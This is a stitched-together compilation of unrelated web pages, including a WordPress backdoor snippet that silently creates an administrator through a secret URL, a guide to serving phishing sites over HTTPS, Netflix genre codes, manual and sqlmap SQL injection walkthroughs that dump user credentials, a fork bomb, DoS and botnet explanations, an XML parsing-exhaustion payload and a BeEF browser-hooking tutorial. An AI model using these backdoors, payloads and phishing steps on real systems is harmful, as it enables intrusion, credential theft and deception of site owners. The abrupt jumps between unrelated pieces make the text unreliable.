When the front door is closed, you might try the backdoor. This might sound like a malicious way of using the code for entering the site without having the access to it, but there are actually times when you need to control your own site if somebody stole it.

No matter how many times this thief deletes your information or restores a backup on a server he probably owns, there is a chance he doesn’t know anything about backdoor entrances. If he did, he probably wouldn’t even need your help in setting up WordPress, right?

Create a backdoor:

OK, enough with the talk; here’s a piece of code you will need to get the job done:

1. Open functions.php file
2. Copy/Paste following code:

add_action('wp_head', 'wplo_backdoor'); 
function wploop_backdoor() {
        If ($_GET['backdoor'] == 'hellomoto') {
                require('wp-includes/registration.php');
                If (!username_exists('username')) {
                        $user_id = wp_create_user('name', 'pass');
                        $user = new WP_User($user_id);
                        $user->set_role('administrator');
                }
        }
}
?>

1. Save changes

If you leave the code as it is, all you would have to do to create a new admin on the site is visit http://www.yourdomain.com/?backdoor=hellomoto

After the page was loaded, your new username is “name” and password “pass”.

Of course, you can change that in the code above by changing ‘name’ and ‘pass’ to whatever you want. You can also change the link to your back door by changing ‘backdoor’ and/or ‘hellomoto’ to anything you come up with.

Try the function – not only it is fun but it can really help you sometime in the future when you’re about to create a site for someone you can’t trust completely.

OBTAINING AN SSL CERTIFICATE FROM LETSENCRYPT.ORG

Take this a step further; HTTPS should be implemented on all your phishing sites regardless if they harvest sensitive data or not. You’ve got a much better chance of bypassing any web proxy servers in place by running a full encrypted stream.

Phishing Frenzy now supports using an SSL Certificate and hosting your websites over HTTPS. Since Phishing Frenzy is essentially a front end for the Apache web service, you can upload your SSL certificate, activate the campaign and watch it all come to life over HTTPS. Now that’s legit.

How it Works

Let’s Encrypt has a nifty command line tool that we can run from our phishing server to quickly obtain our valid SSL certificate. The command line tool has now been renamed to “certbot” and can be downloaded off github here:

https://github.com/certbot/certbot

Once you’ve downloaded the script onto your server, it’s really a one-liner to get the SSL certificate in your possession.

The first item to note is that Apache cannot be running while you run certbot. In order for Let’s Encrypt to validate that you own the domain, it will resolve the FQDN to an IP address of the server you are currently on. Certbot will then start up a mini web service hosting a token which proves to Let’s Encrypt that you’re authoritative over this domain name.

This means that if you have any active phishing campaigns they would be disabled temporarily while you obtain the SSL certificate. Keep this in mind to make sure you’re not disrupting an active campaign of yours or a colleague.

CONFIGURING APACHE

If you try to invoke the certbot script with Apache running you’ll be notified with a nice little warning like below:

So once you’ve properly disabled your active web server, you can then run the “certbot” command similar to below. Make sure to tweak this for the domain name that you’re configuring.

./certbot-auto certonly –standalone –d www.pentestgeek.com

The standalone flag is used to tell the “certbot” tool that you want it to run a mini web service to properly authenticate with Let’s Encrypt by hosting a web page temporarily. The “certonly” flag is used to tell “certbot” that you don’t want the tool to automatically configure Apache with the SSL certificate. Just provide us the certificate, and we’ll deploy them to Apache ourselves through the Phishing Frenzy Web UI.

Once you’ve invoked this successfully, you are the new proud owner of some valid SSL certificates; Congratulations. By default all of the certificates will be dropped to the /etc/letsencrypt/live/:fqdn which is really a symbolic link to the /etc/letsencrypt/archive/:fqdn directory as seen below:

CONFIGURING PHISHING FRENZY

Now that we have all of the SSL files required to host our phishing site over HTTPS.  Let’s start Apache back up and jump back over to our campaign within Phishing Frenzy. All we need to do is upload the SSL certificate as seen below and save. Make sure to assign the proper cert, key and chain properly using the dropdowns on the right.

Once this data has been uploaded and saved to the campaign properly, you can then activate the campaign and your phishing site is now live over HTTPS.  Anyone who tries to hit the phishing site over HTTP will be automatically redirected to HTTPS by default.

Conclusion

If you’re not leveraging HTTPS for all your phishing engagements you should be. Letsencrypt.org is a great service and is changing the world of SSL certificate authorities. It’s no cost to you, and the tools are really slick to auto-magically configure your Nginx or Apache web server with a couple added flags.

In the future we may incorporate Let’s Encrypt into the Web UI itself so that it communicates with the Let’s Encrypt API to pull down the SSL certificate and apply it to the current campaign.

Hope you enjoyed, and enjoy phishing all the things over HTTPS.

• Like most of the major search engines, Google assembles the pages in its search index by using special “searchbot” or crawler software to scour the Web. Found pages are automatically added to Google’s ever-expanding database; when you perform a search, you’re actually searching this database of Web pages, not the Web itself.
• The results of your Google searches are ranked according to Google’s trademarked PageRank technology. This technology measures how many other pages link to a particular page; the more links to a page, the higher that page ranks. In addition, PageRank assigns a higher weight to links that come from higher-ranked pages. So if a page is linked to from a number of high-ranked pages, that page will itself achieve a higher ranking.
• The theory is that the more popular a page is, the higher that page’s ultimate value. While this sounds a little like a popularity contest (and it is), it’s surprising how often this approach delivers high-quality results.
• The number of Web pages indexed by Google is among the largest of all search engines (Google and AllTheWeb are continually jockeying for “biggest” bragging rights), which means you stand a fairly good chance of actually finding what you were searching for. And the Google search engine is relatively smart; it analyzes the keywords in your query and recognizes the type of search result you’re looking for. (For example, if you enter a person’s name and city, it knows to search its phone book—not the general Web index.)

SECRET codes can unlock shows and movies you never knew were hiding in the Netflix library. Here’s how to find them.

Netflix Secret Codes List

• Action & Adventure: 1365
• Action Comedies: 43040
• Action Sci-Fi & Fantasy: 1568
• Action Thrillers: 43048
• Adult Animation: 11881
• Adventures: 7442
• African Movies: 3761
• Alien Sci-Fi: 3327
• Animal Tales: 5507
• Anime: 7424
• Anime Action: 2653
• Anime Comedies: 9302
• Anime Dramas: 452
• Anime Fantasy: 11146
• Anime Features: 3063
• Anime Horror: 10695
• Anime Sci-Fi: 2729
• Anime Series: 6721
• Art House Movies: 29764
• Asian Action Movies: 77232
• Australian Movies: 5230
• B-Horror Movies: 8195
• Baseball Movies: 12339
• Basketball Movies: 12762
• Belgian Movies: 262
• Biographical Documentaries: 3652
• Biographical Dramas: 3179
• Boxing Movies: 12443
• British Movies: 10757
• British TV Shows: 52117
• Campy Movies: 1252
• Children & Family Movies: 783
• Chinese Movies: 3960
• Classic Action & Adventure: 46576
• Classic Comedies: 31694
• Classic Dramas: 29809
• Classic Foreign Movies: 32473
• Classic Movies: 31574
• Classic Musicals: 32392
• Classic Romantic Movies: 31273
• Classic Sci-Fi & Fantasy: 47147
• Classic Thrillers: 46588
• Classic TV Shows: 46553
• Classic War Movies: 48744
• Classic Westerns: 47465
• Comedies: 6548
• Comic Book and Superhero Movies: 10118
• Country & Western/Folk: 1105
• Courtroom Dramas: 528582748
• Creature Features: 6895
• Crime Action & Adventure: 9584
• Crime Documentaries: 9875
• Crime Dramas: 6889
• Crime Thrillers: 10499
• Crime TV Shows: 26146
• Cult Comedies: 9434
• Cult Horror Movies: 10944
• Cult Movies: 7627
• Cult Sci-Fi & Fantasy: 4734
• Cult TV Shows: 74652
• Dark Comedies: 869
• Deep Sea Horror Movies: 45028
• Disney: 67673
• Disney Musicals: 59433
• Documentaries: 6839
• Dramas: 5763
• Dramas based on Books: 4961
• Dramas based on real life: 3653
• Dutch Movies: 10606
• Eastern European Movies: 5254
• Education for Kids: 10659
• Epics: 52858
• Experimental Movies: 11079
• Faith & Spirituality: 26835
• Faith & Spirituality Movies: 52804
• Family Features: 51056
• Fantasy Movies: 9744
• Film Noir: 7687
• Food & Travel TV: 72436
• Football Movies: 12803
• Foreign Action & Adventure: 11828
• Foreign Comedies: 4426
• Foreign Documentaries: 5161
• Foreign Dramas: 2150
• Foreign Gay & Lesbian Movies: 8243
• Foreign Horror Movies: 8654
• Foreign Movies: 7462
• Foreign Sci-Fi & Fantasy: 6485
• Foreign Thrillers: 10306
• French Movies: 58807
• Gangster Movies: 31851
• Gay & Lesbian Dramas: 500
• German Movies: 58886
• Greek Movies: 61115
• Historical Documentaries: 5349
• Horror Comedy: 89585
• Horror Movies: 8711
• Independent Action & Adventure: 11804
• Independent Comedies: 4195
• Independent Dramas: 384
• Independent Movies: 7077
• Independent Thrillers: 3269
• Indian Movies: 10463
• Irish Movies: 58750
• Italian Movies: 8221
• Japanese Movies: 10398
• Jazz & Easy Listening: 10271
• Kids Faith & Spirituality: 751423
• Kids Music: 52843
• Kids’ TV: 27346
• Korean Movies: 5685
• Korean TV Shows: 67879
• Late Night Comedies: 1402
• Latin American Movies: 1613
• Latin Music: 10741
• Martial Arts Movies: 8985
• Martial Arts, Boxing & Wrestling: 6695
• Middle Eastern Movies: 5875
• Military Action & Adventure: 2125
• Military Documentaries: 4006
• Military Dramas: 11
• Military TV Shows: 25804
• Miniseries: 4814
• Mockumentaries: 26
• Monster Movies: 947
• Movies based on children’s books: 10056
• Movies for ages 0 to 2: 6796
• Movies for ages 2 to 4: 6218
• Movies for ages 5 to 7: 5455
• Movies for ages 8 to 10: 561
• Movies for ages 11 to 12: 6962
• Music & Concert Documentaries: 90361
• Music: 1701
• Musicals: 13335
• Mysteries: 9994
• New Zealand Movies: 63782
• Period Pieces: 12123
• Political Comedies: 2700
• Political Documentaries: 7018
• Political Dramas: 6616
• Political Thrillers: 10504
• Psychological Thrillers: 5505
• Quirky Romance: 36103
• Reality TV: 9833
• Religious Documentaries: 10005
• Rock & Pop Concerts: 3278
• Romantic Comedies: 5475
• Romantic Dramas: 1255
• Romantic Favorites: 502675
• Romantic Foreign Movies: 7153
• Romantic Independent Movies: 9916
• Romantic Movies: 8883
• Russian: 11567
• Satanic Stories: 6998
• Satires: 4922
• Scandinavian Movies: 9292
• Sci-Fi & Fantasy: 1492
• Sci-Fi Adventure: 6926
• Sci-Fi Dramas: 3916
• Sci-Fi Horror Movies: 1694
• Sci-Fi Thrillers: 11014
• Science & Nature Documentaries: 2595
• Science & Nature TV: 52780
• Screwball Comedies: 9702
• Showbiz Dramas: 5012
• Showbiz Musicals: 13573
• Silent Movies: 53310
• Slapstick Comedies: 10256
• Slasher and Serial Killer Movies: 8646
• Soccer Movies: 12549
  
• Social & Cultural Documentaries: 3675
• Social Issue Dramas: 3947
• Southeast Asian Movies: 9196
• Spanish Movies: 58741
• Spiritual Documentaries: 2760
• Sports & Fitness: 9327
• Sports Comedies: 5286
• Sports Documentaries: 180
• Sports Dramas: 7243
• Sports Movies: 4370
• Spy Action & Adventure: 10702
• Spy Thrillers: 9147
• Stage Musicals: 55774
• Stand-up Comedy: 11559
• Steamy Romantic Movies: 35800
• Steamy Thrillers: 972
• Supernatural Horror Movies: 42023
• Supernatural Thrillers: 11140
• Tearjerkers: 6384
• Teen Comedies: 3519
• Teen Dramas: 9299
• Teen Screams: 52147
• Teen TV Shows: 60951
• Thrillers: 8933
• Travel & Adventure Documentaries: 1159
• TV Action & Adventure: 10673
• TV Cartoons: 11177
• TV Comedies: 10375
• TV Documentaries: 10105
• TV Dramas: 11714
• TV Horror: 83059
• TV Mysteries: 4366
• TV Sci-Fi & Fantasy: 1372
• TV Shows: 83
• Urban & Dance Concerts: 9472
• Vampire Horror Movies: 75804
• Werewolf Horror Movies: 75930
• Westerns: 7700
• World Music Concerts: 2856
• Zombie Horror Movies: 75405

Introduction

Lets get started at an apparently unrelated point. Lets assume we create a table in SQL. Now there are three main parts of a database management system, like SQL. They are –

Steps

• Manually using some standard codes available online (and if you know SQL then you can figure most of the stuff out yourself). For example, you can instruct the database to give you all the data from a table by executing the command-

SELECT * FROM Users WHERE UserId = 105 or 1=1

Now, while the first part of the query “UserID=105” may not be true for all user, the condition 1=1 will always be true. So basically the query will be prompted to  return all the data about the user for all the users for whom 1=1. Effectively, you have the username and passwords and all other information about all the users of the website.

The first command is legit and gives you access to data of srinivas only, and only in the condition where the password is correct. The second statement gives you access to data of all accounts.

• Using some tool – Some tools help in making the process easier. You still have to use commands but using tools is much more practical after you have an idea what is actually happening. I don’t recommend all the GUI Windows tools which are found on malware filled websites, and never work. All throughout this blog we have used Kali Linux, and if you really are serious about hacking, there is no reason not to have Kali linux installed. In Kali linux, there is a great tool called SQLMap that we’ll be using.

That’s it for this tutorial, you now know how SQL Injections work. It might be worth your time learning some SQL on W3schools till I come up with some other tutorial. Also, check out the navigation bar at the top of the blog to see if you find something that interests you. We have a lot of tutorials for beginners in the field of hacking.

Sql Injection – Hacking Websites

In this post we will hack a website and obtain its data using SQL injection attack. We will not use any tools. This is one of the few tuts on this blog for which you don’t need Kali Linux. You can easily carry it out from Windows machine on any normal browser. If you need to get a big picture of what a SQL injection attack actually does, take a look at this tutorial on Basics Of SQL Injection.

SQL Injection

Finding A Vulnerable Website

Dorks

Using Dorks

inurl:”products.php?prodID=”

inurl:buy.php?category=

What you have to notice here is the structure of the commands. The inurl instructs google to look at the URLs in it’s search index and provide us with the ones which have a specific line in them. Inside the inverted commas is the specific URL which we would expect to see in a vulnerable website. All the vulnerable sites will surely have a .php in their URL, since it is an indicator that this website uses SQL database here. After the question mark you will have a ?something= clause. What lies after the = will be our code that is known to cause malfunctioning of databases and carrying out of a Sql Injection attack.
After you have used the dork, you have a list of potentially vulnerable sites. Most of them though, may not be vulnerable (i.e not the way you want them to be, they might still be having some vulnerabilities you don’t know about yet). The second step is finding the actually vulnerable sites from a list of possible ones.

Testing sites for vulnerabilities

A typical error message

But right now you only know that the site is vulnerable. You still have to find which colums/rows are vulnerable.

Finding number of columns/rows

Unification

This is what you vulnerable page looks like to start with

As you can guess, it is vulnerable to SQL injection attack

Now we need to find the number of columns.

10 columns. Nothing so far.

12 columns. Error….

So if there was an error on 12th columns. This means there were 11 columns total. So to find the vulnerable column, we have to execute –

http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11

This does not return any error. As I said before, adding a minus sign (-) after = and before 1 will help.

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11

Now we can see total four numbers on the page. 11,7,2 and 9. It won’t be hard to figure out which of them depicts the vulnerable column

You can take a look at the page http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11 (no minus sign that is). Now scroll down to the bottom. You will see this-

Comparing the pic with and without the error, we can easily say that the unexpected element in the malfunctioned page is the number 11. We can conclude that 11th column is the vulnerable one. These kind of deductions make hacking very interesting and remind you it’s more about logic and creativity than it’s about learning up useless code.
Now we are finally where we left out before we changed our stream. We need to find the sql version. It can sometimes be very tricky. But lets hope its not in this case.
Now get the code that told you about the vulnerable column and replace the vulnerable column (i.e. 11) with @@version. The url will look like this.

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,@@version

Now finally you’ll see something like

The server is using Sql version 5.1.69, most probably MySQL (pretty common). Also we know the OS is Ubuntu.
And the thing I said about it being tricky sometimes. Sometimes the server does not understand the @@version command directly and you need to convert it. You will need to replace @@version with convert(@@version using latin1) or unhex(hex(@@version)).
Now the information gathering part is complete. We have to move to actual download of tables. Just write down all you know about their database, table and server. You must have a real sense of accomplishment if you have followed the tutorial so far. The boring part always requires maximum motivation and determination.

Extracting tables from SQL database

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,table_name+from+information_schema.tables

As you can see, the name of the table is character_sets. However, this is just one table. We can replace the table_name with group_concat(table_name) to get all tables

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name)+from+information_schema.tables

We now have the names of all the tables. Here it is – CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESSION_VARIABLES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVIL
As you see, the ending of the last table is incomplete. To correct this, you can modify the end of the url to something like +from+information_schema.tables+where+table_schema=database()

Obtaining columns

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(column_name)+from+information_schema.columns+where+table_name=0x4556454e5453

We now know the columns of the table events

Extracting data from columns

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,EVENT_CATALOG+from+information_schema.EVENTS

The page didn’t display properly, this means that the our query was fine. The lack of any data is due to the fact that the table was actually empty. We have to work with some other table now. Don’t let this failure demotivate you.

However, our luck has finally betrayed us, and all this time we have been wasting our time on an empty table. So we’ll have to look at some other table now, and then look at what columns does the table have. So, I looked at the first table in the list, CHARACTER_SETS and the first column CHARACTER_SET_NAME. Now finally we have the final code as-

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME)+from+information_schema.CHARACTER_SETS

This table has a lot of data, and we have all the character_sets name.

So finally now you have data from CHARACTER_SET_NAME column from CHARACTER_SETS table . In a similar manner you can go through other tables and columns. It will be definitely more interesting to look through a table whose name sounds like ‘USERS’ and the columns have name ‘USERNAME’ and ‘PASSWORD’.  I would show you how to organize results in a slightly better way and display multiple columns at once. This query will return you the data from 4 columns, seperated by a colon (:) whose hex code is 0x3a.

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME,0x3a,DEFAULT_COLLATE_NAME,0x3a,DESCRIPTION,0x3a,MAXLEN)+from+information_schema.CHARACTER_SETS

Finally you have successfully conducted an sql injection attack in the hardest possible way without using any tools at all. We will soon be discussing some tools which make the whole process a whole lot easier. However, it is pointless to use tools if you don’t know what they actually do.

In the previous tutorial, we hacked a website using nothing but a simple browser on a Windows machine. It was a pretty clumsy method to say the least. However, knowing the basics is necessary before we move on to the advanced tools. In this tutorial, we’ll be using Kali Linux (see the top navigation bar to find how to install it if you haven’t already) and SqlMap (which comes preinstalled in Kali) to automate what we manually did in theManual SQL Injection tutorial to hack websites.

Now it is recommended that you go through the above tutorial once so that you can get an idea about how to find vulnerable sites. In this tutorial we’ll skip the first few steps in which we find out whether a website is vulnerable or not, as we already know from the previous tutorial thatthis website is vulnerable.

Kali Linux

Sqlmap

Hacking Websites Using Sqlmap in Kali linux

Sql Version

sqlmap -h

It lists the basic commands that are supported by SqlMap. To start with, we’ll execute a simple command
sqlmap -u <URL to inject>. In our case, it will be-

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1

Sometimes, using the –time-sec helps to speed up the process, especially when the server responses are slow.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –time-sec 15

The final result of the above command should be something like this.

Database

List of  a few common enumeration commands

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –dbs

So the two databases are acuart and information schema.

Table

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart –tables

The result should be something like this –
Database: acuart
[8 tables]
+———–+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+———–+
Now we have a list of tables. Following the same pattern, we will now get a list of columns.

Columns

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users –columns

Data

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass –dump

Here’s the result

John Smith, of course. And the password is test. Email is email@email.com?? Okay, nothing great, but in the real world web pentesting, you can come across more sensitive data. Under such circumstances, the right thing to do is mail the admin of the website and tell him to fix the vulnerability ASAP. Don’t get tempted to join the dark side. You don’t look pretty behind the bars. That’s it for this tutorial.

Just like most other things associated with hacking, a denial of service attack is not everyone’s cup of tea. It, however, can be understood if explained properly. In this tutorial, I’ll try to give you a big picture of denial of service attacks, before I start using geeky terms like packets and all that. We’ll start at the easiest point.

What effect does a denial of service attack have

Basic Concept

Scenario One : Multiplayer online game

They made a Swastika and blocked access to the pool

Scenario 2 : Bus stop

How denial of service attacks are carried out

A Live DOS on your Kali Machine

:(){ :|:& };:

Crashing Windows Using Batch file

:1
Start
goto 1

In a previous post, I had introduced you to the basic idea of a denial of service attack. We used real life examples (bus stop and online game) to depict the idea behind a DOS attack. We crashed our own Windows and Kali Linux machine (using batch and command line interface respectively). Now it’s time to learn how actually DOS of service attacks work, in terms of packets and other networking terms. So here is a one by one description on four of the well known attacks.

Various methods of Denial Of Service attack

ICMP flooding (smurfing)

Contents of an ICMP packet (should not bother you currently)

ICMP packets have two purposes (technically)-

SYN flooding

The three way handshake (that didn’t happen in our case)

In SYN flooding, the attacker send the target a large number of TCP/SYN packets. These packets have a source address, and the target computer replies (TCP/SYN-ACK packet) back to the source IP, trying to establish a TCP connection. In ideal condition, the target receives an acknowledgement packet back from the source, and the connection established is in a fully open state. However, the attacker uses a fake source address while sending TCP packets to the victim, and the target’s reply goes to an inexistent IP, and therefore, does not generate an acknowledgement packet. The connection is never established, and the target is left with a half open connection. Eventually, a lot of half open connections are created, and the target network gets saturated to the point where it does not have resources left to respond to the genuine packets, resulting in a successful DOS attack. Also, since the connections stay open for a while, the server loses its ability to work for a good amount of time after the attack has been stopped.

Teardrop attack

A small botnet

Now, this is not an attack is such, rather, it is a way of carrying out the attacks more effectively. When carried out against a large server, the above attacks usually prove ineffective. Your home router is nothing when compared to the HUGE servers that big websites have, and handling a single PCs DOS effect can be a piece of cake. This leads to the need of a Distributed Denial of Service attack. In a distributed denial of service, hacking groups use their numbers as strength. For example, if you have 500 friends who know how to carry out a denial of service attack, then the combined impact is much more dangerous than that of a lone PC. However, it is not always possible to have 500 hackers next door, and not all of us are part of large black hat hacking organisations.

Try not to end up like this

This is where the botnets steps in. Now the bad guys use tools called RATs (remote administration tools) to infect and get total control over computers over the internet. The RATs are a kind of trojan, and can lie there on your PC and you’ll never find out. By the use of crypting, some hackers have mastered anti-virus evasion, and these RATs can lie undetected on your PC for years. This is 100% illegal. You can easily end up in jail for this, and I recommend that you stay away from this. But, its important that you are aware of the existence of such tools, and more importantly, what the hackers can do with them. Now lets assume you made a RAT and its has infected 10,000 people. You can actually control those 10,000 computers. Now there’s this website server that you don’t like, and you’re this badass hacker who takes down stuff he doesn’t like. No, you don’t have a warehouse full of networking power (servers), but you do have ten thousand computers at your disposal, and this is called a botnet. You also have 5 friends who are hackers, and have similarly sized botnets. Such immense networking power can easily take down a large website for hours, if not days. The results of flooding packets from 50,000 computers can be catastrophic. With modern day firewalls, it is almost impossible to flood servers and take them down using one single computers, so while botnets are the most unethical entities, they are also the most powerful. Now here is a suggestion, Denial of Service attacks are easy to trace back (if you are a beginner), and even if you are good, there is always someone better, and you can’t hide forever. So try not to send bad packets at random websites, you won’t look good in orange

Running sqlmap yourself is not difficult. Read through this tutorial and you will get an introduction to a powerful sql injection testing tool. Of course this is the same tool we use on our online sql injection test site.

One thing to keep in mind is that Sqlmap is a python based tool, this means it will usually run on any system with python however we like Ubuntu, it simply makes it easier to get stuff done. Python comes already installed in Ubuntu. To get started with sqlmap it is a matter of downloading the tool, unpacking it and running the command with the necessary options. Lets not get ahead of ourselves, there may be some Windows users amongst you so let me start off with getting an Ubuntu install up and running. It is easy to get started on an Ubuntu Linux system even if the thought of Linux sends into shivering spasms of fear. Who knows you may even like it.

If you are running Microsoft Windows as your main operating system you will likely find it the most convenient and simple to run an install of Ubuntu Linux in a virtual machine. You can then play with sqlmap, nmap, nikto and openvas along with a hundred other powerful open source security tools. If you would like to perform remote scanning such as that provided by hackertarget.com you could pay for a cheap Ubuntu based VPS from one of hundreds of providers, paying anything from $10 per month to $100 or so. Linode is great for this, providing high quality and solid systems for the price.

Step 1: Install Virtualbox

Virtualbox is a free and easy to use virtual machine manager, you could of course use VMware or Parallels but we will use virtualbox.

Select Bridge for your adapter, you could do NAT or Host Only of course just depends on your requirements. By using bridge mode your VM will have an IP address on your local network this makes it easier when you are playing with network based security testing tools. Security testing is fun, just ensure you only test on systems you own / operate or have permission to scan.

Step 2: Ubuntu Installation

Download the latest Ubuntu iso from http://www.ubuntu.com, select the ISO as the boot media for your guest and start the virtual machine. Select the install option and Ubuntu will be installed onto the virtual hard disk on the machine.

Step 3: SQLmap Installation

Python is pre-installed in Ubuntu so all you need to do is download sqlmap from sourceforge, unpack it into a directory and start your testing.

wget from http://sqlmap.sourceforge.net/#download

You can unpack it with a GUI based tool (double click on it) or use tar and gzip together with this command.

tar zxvf sqlmap-0.9.tar.gz

cd sqlmap

python sqlmap.py

This should be your results when you run the sqlmap.py script from a working installation:

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

Usage: python sqlmap.py [options]

sqlmap.py: error: missing a mandatory parameter ('-d', '-u', '-l', '-r', '-g', '-c', '--wizard' or '--update'), -h for help

The error is merely telling us we did not fill in the necessary parameters for a test to take place. You can repeat the command using the (-h) to get a full list of options or see the excellent online help and tutorials on the sqlmap project page.

For a simple test we will use the HTTP GET testing option against a single uri.

python sqlmap.py -u 'http://mytestsite.com/page.php?id=5'

This will run a bunch of sql injection tests against that URL with the parameter (id) being tested for SQL Injection.

SQLmap can be used to not only test but also to exploit SQL Injection, doing things such as extracting data from databases, updating tables and even popping shells on remote hosts if all the ducks are in line. All these options and examples are available on the excellent sourceforge project page. So now you have a working installation get on over there and start testing.

– Microsoft Source Code Analyzer – www.microsoft.com

– Microsoft UrlScan – www.microsoft.com

– dotDefender – www.applicure.com

– IBM AppScan – www.ibm.com

– HP WebInpect – www.hp.com

– SQLDict – ntsecurity.nu

– HP Scrawlr – www.hp.com

– Paros – www.darknet.org.uk

– SQL Block Monitor – sql-tools.net

– Acunetix – www.acunetix.com

– GreenSQL – www.greensql.net

– CAT.NET – www.microsoft.com

Attack description

Coercive Parsing is one of the simplest attacks to mount! It aims at exhausting the system resources of the attacked web service. The attacker just sends a SOAP message with an unlimited amount of opening tags in the SOAP Body. In other words: The attacker sends a very deeply nested XML document to the attacked web service.

Test on AXIS 2 web services showed that the attack results in a CPU usage of 100% while the SOAP message is processed. When using a socket on the attacker side the attack can last for as long as a connection between the attacker and the victim exists. All the attacker has to do is “pump” opening tags in the socket for as long as he wishes to disable the web service.

This attack is one of the more devastating denial of service attacks, however countermeasures are available.

NOTE: Only web services using a DOM parser are susceptible to this attack. The DOM Parser creates an in-memory representation of the SOAP message. During this process the SOAP message size can raise by a factor of 2 to 30. When very large documents are processed memory exhaustion is often the result. When using a streaming based parser like SAX it is very unlikely for the attack to succeed, since the entire document is never loaded in memory.[1]

Attack subtypes

There are no attack subtypes for this attack.

Prerequisites for attack

In order for this attack to work the attack has to have knowledge about the following things:

1. Attacker knows the endpoint of web service. WSDL is not required, since the attack is solely focused on the XML Parser. It doesn’t matter if the Operations within the SOAP Message are valid.
2. Attacker can reach the endpoint from its location. Access to the attacked web service is required. If the web service is only available to users within a certain network of a company, this attack is limited.

Graphical representation of attack

• Red = attacked web service component
• Black = location of attacker
• Blue = web service component not directly involved in attack.

Attack example

The following SOAP message shows an example with a “Coercive Parsing Attack” payload.

<soapenv:Envelope xmlns:soapenv="..." xmlns: soapenc:"...">
<soapenv:Body>
 <x>
    <x>
       <x>  
          <x>
             <x>
                 <!-- Continued for as long as wanted by the attacker -->

Listing 1: “Coercive Parsing Attack” payload.

Attack mitigation / countermeasures

The “Coercive Parsing” attack can be fully stopped when using strict schema validation. Each WSDL should contain a detailed description of the used elements, attributes, and data types. For example when only one Element <Surname> is expected within the SOAP body the XML Schema should contain the following elements:

..
<!-- excerpt fictional XML Schema -->
<xs:element name="Surname" type="xs:string"/>
..

Listing 2: Excerpt of a XML Schema for the tag “Surname”
By using the data type “string” only strings are allowed within the element tags. The injection of more tags within the <Surname> tag is not possible. Since the default maximum and minimum number of occurrences is 1, the element has to show up exactly one time in the SOAP body. If no other tags are defined within the XML Schema of the SOAP body, any other tag is prohibited by default too, making it impossible to mount the attack. Therefore any SOAP message that violates this schema is rejected.

It is understood that a strict schema validation is resource intensive, however one should be clear how easy it is to compromise the availability of a web service when turning off schema validation.

Today we’re going to be introducing a new tool for hacking web browsers. Often times, we will need to exploit a variety of vulnerabilities associated with web browsers. For this sort of exploitation, we can use a popular tool named BeEF (Browser e Exploitation Framework).

How BeEF works is actually fairly easy to understand. There is a JavaScript file provided by BeEF, simply named hook.js. Our job as the attacker is to find a way to run this JavaScript on the victim’s browser. Once it’s been run, we will have control over their browser in various aspects. There are multiple ways we can execute this script. For example, we could set up a phishing page with the hook inside of the HTML code, or we could inject it into their traffic using a Man in the Middle attack. But today we’re just going to be using the demo page provided by BeEF. So, let’s get started!

Step 1: Start up and Login to BeEF

If we’re going to use BeEF, we need to start it! If you’re using Kali 2, you can find BeEF on the dock. If you are aren’t using Kali 2, you can launch BeEF by enter the following command:

service beef-xss start

Now that we’ve started BeEF, we need to login. If we point our web browser at the localhost on port 3000 with the /ui/authentication URI, we will see the BeEF login page (In short: 127.0.0.1:3000/ui/authentication). When we see this page, we need to enter the default credentials in order to use BeEF. The default username and password are both “beef.” Let’s go ahead and log in now:

Alright, now that we’ve entered our credentials and logged in, we can see the first page. Let’s take a look at this page and then we’ll break it down:

Now, to our immediate left we can see a section named “hooked browsers.” This is where BeEF will list all the browsers we currently have under our control. There is only one victim here at the moment, which is ourselves. Now that we’ve logged in and seen the start page, let’s move on to hooking our victim.

Step 2: Hook the Victim

Now that we have BeEF up and running, we need to hook the victim so that we can control their browser. We will be using the BeEF demo page to run the hook. Now we need to move the victim and navigate to the demo page. The demo page can be accessed in the browser by entering the address of the attacking system on port 3000 under /demos/basic.html. So, for our demonstration today, we need to enter 10.0.0.19:3000/demos/basic.html on our victims browser, let’s do that now:

Now that we’ve navigated our victim to the demo page containing the BeEF hook, we should see them appear under the “hooked browsers” section we saw earlier:

There we go! We’ve successfully hooked our victims browser. Now that we have some basic control over it, we can do many things that will aid us in compromising this victim.

Step 3: Wreak Havoc

Now that we can control our victims browser, we’re going to demonstrate the kind of things we can do. We’re simply going to use some JavaScript to find out what plugins are installed on the browser. First, we need to select our victim and navigate to the “commands” tab of BeEF’s GUI. Let’s see what this looks like now:

